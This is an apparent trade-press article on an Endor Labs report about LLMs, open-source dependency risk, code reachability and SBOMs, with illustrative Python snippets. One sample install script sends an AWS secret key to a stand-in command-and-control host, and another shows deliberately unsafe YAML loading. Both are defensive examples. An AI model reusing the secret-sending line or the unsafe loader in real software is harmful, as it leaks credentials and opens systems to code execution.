LLMs and AI positioned to dominate the AppSec world
As modern software trends toward distributed architectures, microservices, and extensive use of third-party and open source components, dependency management only gets harder, according to Endor Labs.
Application development risks
A new research report explores emerging trends that software organizations need to consider as part of their security strategy, as well as the risks associated with using existing open source software (OSS) in application development.
In particular, as modern software development increasingly adopts distributed architectures and microservices alongside third-party and open source components, the report tracks the astonishing popularity of ChatGPT’s API, the inability of current large language model (LLM)-based AI platforms to accurately classify malware risk in most cases, and the fact that almost half of all applications make no calls at all to security-sensitive APIs in their own code base.
“The fact that there’s been such a rapid expansion of new technologies related to Artificial Intelligence, and that these capabilities are being integrated into so many other applications, is truly remarkable—but it’s equally important to monitor the risks they bring with them,” said Henrik Plate, lead security researcher at Endor Labs Station9.
“These advances can cause considerable harm if the packages selected introduce malware and other risks to the software supply chain. This report offers an early look into this critical function, just as early adopters of matching security protocols will benefit most from these capabilities,” added Plate.
Unused code vulnerabilities
Existing LLM technologies still can’t be used to reliably assist in malware detection at scale; in fact, they accurately classify malware risk in barely 5% of all cases. They have value in manual workflows, but will likely never be fully reliable in autonomous workflows, because they can’t be trained to recognize novel approaches, such as those derived through LLM recommendations.
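To picture what such a manual workflow can look like, here is a minimal sketch in which an LLM is asked to flag a suspicious install script for human triage. The prompt wording, model name, and snippet are illustrative assumptions rather than details from the report, and the verdict only feeds a review queue rather than any automated decision.

```python
# Minimal sketch: LLM-assisted triage of a suspicious package snippet.
# Assumes the OpenAI Python SDK (>=1.0) and an OPENAI_API_KEY in the environment;
# the prompt, snippet, and model choice are illustrative only.
from openai import OpenAI

client = OpenAI()

SNIPPET = """
import os, urllib.request
urllib.request.urlopen("http://example.invalid/c2",
                       data=os.environ.get("AWS_SECRET_ACCESS_KEY", "").encode())
"""

response = client.chat.completions.create(
    model="gpt-4",  # illustrative model choice
    messages=[
        {"role": "system",
         "content": "You review open source code for signs of malicious behavior. "
                    "Answer 'suspicious' or 'benign' with a one-sentence reason."},
        {"role": "user", "content": f"Review this install-time script:\n{SNIPPET}"},
    ],
)

# The verdict goes to a human review queue; it is not acted on automatically.
print(response.choices[0].message.content)
```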
While 45% of applications make no calls to security-sensitive APIs in their own code base, that number drops to just 5% once dependencies are included. Organizations routinely underestimate risk when they don’t analyze how such APIs are reached through their open source dependencies.
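As a hypothetical illustration of that blind spot, the application code below never calls a security-sensitive API itself, yet the made-up library it depends on spawns a shell command on its behalf; a scan limited to first-party code would report nothing sensitive. The `imagetools` package and its `make_thumbnail` helper are invented for the example.

```python
# app.py -- first-party code: no security-sensitive API appears here.
from imagetools import make_thumbnail  # hypothetical third-party dependency

def handle_upload(path: str) -> str:
    return make_thumbnail(path, width=128)


# imagetools/__init__.py -- inside the dependency, a shell command is spawned,
# so the application does reach a security-sensitive API (subprocess) after all.
import subprocess

def make_thumbnail(path: str, width: int) -> str:
    out = f"{path}.thumb.png"
    subprocess.run(["convert", path, "-resize", str(width), out], check=True)
    return out
```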
Even though 71% of typical Java application code comes from open source components, applications use only 12% of that imported code. Vulnerabilities in unused code are rarely exploitable, and organizations can eliminate or de-prioritize 60% of remediation work with reliable insights into which code is reachable within an application.
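The reachability argument can be sketched with another invented example: the `configlib` dependency below ships one function with a well-known weakness (unsafe YAML loading) and one harmless helper, but the application only ever calls the harmless one, so a finding against `parse_config` could reasonably be de-prioritized once reachability is established.

```python
# configlib.py -- hypothetical dependency with one risky and one harmless function.
import yaml

def parse_config(text: str):
    # Known weakness: yaml.load with the full Loader can instantiate
    # arbitrary Python objects from untrusted input.
    return yaml.load(text, Loader=yaml.Loader)

def format_version(major: int, minor: int) -> str:
    return f"{major}.{minor}"


# app.py -- the application only ever reaches format_version; parse_config is
# shipped with the dependency but never called, so the vulnerable path is
# unreachable from the application's entry points.
from configlib import format_version

print(format_version(2, 1))
```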
LLM application security
It’s been barely five months since ChatGPT’s API was released, yet Endor Labs’ research has already identified its use in 900 npm and PyPI packages across diverse problem domains, and 75% of those are brand-new packages.
While the advances are undeniable, organizations of all sizes need to exercise due diligence when selecting packages, because the combination of extreme popularity and a lack of historical data creates fertile ground for potential attacks.
Focusing specifically on LLM applications in security, the research uncovers how LLMs can effectively create and hide malware, and even become a nemesis to defensive LLM applications. Given this landscape, organizations will need to document the components and vulnerabilities their applications include, such as through a Software Bill of Materials (SBOM).
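For readers unfamiliar with the format, a standard SBOM entry is little more than an inventory record. The fragment below is a minimal, illustrative CycloneDX-style component entry; the package name, version, and purl are placeholders.

```json
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.4",
  "version": 1,
  "components": [
    {
      "type": "library",
      "name": "requests",
      "version": "2.31.0",
      "purl": "pkg:pypi/requests@2.31.0"
    }
  ]
}
```

An entry like this records what was shipped, but says nothing about whether the code it points to is ever actually used.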
Applications typically use only a small percentage of the open source components they integrate, while developers seldom have visibility into the torrent of dependencies each of those components pulls in.
To satisfy transparency requirements and protect their brand, organizations need to go beyond standard SBOMs: they need to understand not only which components are included, but also how those components are used within their applications and which vulnerabilities are actually exploitable. This enables a better understanding of risk, improves productivity, and reduces cost.